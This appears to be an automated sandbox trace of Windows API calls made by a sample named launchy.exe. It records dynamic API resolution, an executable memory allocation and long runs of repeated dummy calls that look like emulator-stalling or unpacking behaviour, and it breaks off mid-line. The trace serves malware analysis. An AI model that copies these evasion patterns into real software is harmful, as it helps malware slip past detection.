# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 24.06.2020 21:13:13.828 Process: id = "1" image_name = "launchy.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe" page_root = "0x4927b000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x570 [0057.665] LoadCursorFromFileA (lpFileName="rtjuht8reht8wehrt98wh") returned 0x0 [0057.761] GetLastError () returned 0x2 [0057.761] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0057.762] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0057.762] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x4fe9e8 | out: phkResult=0x4fe9e8*=0x7a) returned 0x0 [0057.763] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.763] RegQueryValueExA (in: hKey=0x7a, lpValueName="", lpReserved=0x0, lpType=0x18ff70, lpData=0x18fea4, lpcbData=0x4fe6b0*=0xc8 | out: lpType=0x18ff70*=0x1, lpData="IEnumConnections", lpcbData=0x4fe6b0*=0x11) returned 0x0 [0057.763] LoadLibraryExA (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0057.763] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0057.763] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x210000 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.764] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.765] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.766] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.767] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.768] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.769] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.770] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.771] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.772] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.773] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.774] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.775] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.776] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.777] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0057.848] GetKeyState (nVirtKey=1) returned 0 [0057.856] GetStretchBltMode (hdc=0x1) returned 0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.856] GetStockObject (i=789644) returned 0x0 [0057.857] GetKeyState (nVirtKey=1) returned 0 [0057.857] GetStretchBltMode (hdc=0x1) returned 0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetKeyState (nVirtKey=1) returned 0 [0057.857] GetStretchBltMode (hdc=0x1) returned 0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetKeyState (nVirtKey=1) returned 0 [0057.857] GetStretchBltMode (hdc=0x1) returned 0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.857] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetKeyState (nVirtKey=1) returned 0 [0057.858] GetStretchBltMode (hdc=0x1) returned 0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetKeyState (nVirtKey=1) returned 0 [0057.858] GetStretchBltMode (hdc=0x1) returned 0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.858] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetKeyState (nVirtKey=1) returned 0 [0057.859] GetStretchBltMode (hdc=0x1) returned 0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetKeyState (nVirtKey=1) returned 0 [0057.859] GetStretchBltMode (hdc=0x1) returned 0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject (i=789644) returned 0x0 [0057.859] GetStockObject 